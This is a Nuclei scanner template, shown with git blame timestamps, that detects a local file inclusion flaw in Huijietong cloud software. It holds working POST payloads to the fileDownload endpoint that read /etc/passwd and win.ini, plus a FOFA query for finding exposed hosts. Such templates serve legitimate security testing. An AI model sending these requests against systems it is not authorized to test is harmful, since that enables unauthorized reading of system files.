nuclei-templates/http/vulnerabilities/other/huijietong-cloud-fileread.yaml

38 lines
997 B
YAML
Raw Normal View History

2021-07-05 16:29:12 +00:00
id: huijietong-cloud-fileread
2021-07-05 16:29:12 +00:00
info:
name: Huijietong - Local File Inclusion
2022-05-08 12:41:28 +00:00
author: princechaddha,ritikchaddha
2021-07-05 16:29:12 +00:00
severity: high
2023-10-14 11:27:55 +00:00
description: Huijietong is vulnerable to local file inclusion.
2022-05-08 12:41:28 +00:00
metadata:
max-request: 2
2022-05-08 12:41:28 +00:00
fofa-query: body="/him/api/rest/v1.0/node/role"
2021-07-05 16:29:12 +00:00
tags: huijietong,lfi
http:
2021-07-05 16:29:12 +00:00
- method: POST
path:
- "{{BaseURL}}/fileDownload?action=downloadBackupFile"
2023-10-14 11:27:55 +00:00
2021-07-05 16:29:12 +00:00
body: 'fullPath=/etc/passwd'
2022-05-08 12:44:47 +00:00
2022-05-08 12:41:28 +00:00
- method: POST
path:
- "{{BaseURL}}/fileDownload?action=downloadBackupFile"
2023-10-14 11:27:55 +00:00
2022-05-08 12:41:28 +00:00
body: 'fullPath=/Windows/win.ini'
2021-07-05 16:29:12 +00:00
matchers-condition: and
matchers:
- type: regex
2022-05-08 12:41:28 +00:00
part: body
2021-07-05 16:29:12 +00:00
regex:
- "root:.*:0:0:"
2022-05-09 08:01:15 +00:00
- "\\[(font|extension|file)s\\]"
2022-05-08 12:41:28 +00:00
condition: or
2021-07-05 16:29:12 +00:00
- type: status
status:
- 200
# digest: 4a0a00473045022100cc007c4c1b86b350cb3a8e9436c41fb8531686862c80655c7f082156e16e19b002202c4217904bdf698646fb0fd53c3ca1978fb9c6763d5d3b0d46ff1c8c17b1ebcc:922c64590222798bb761d5b6d8e72950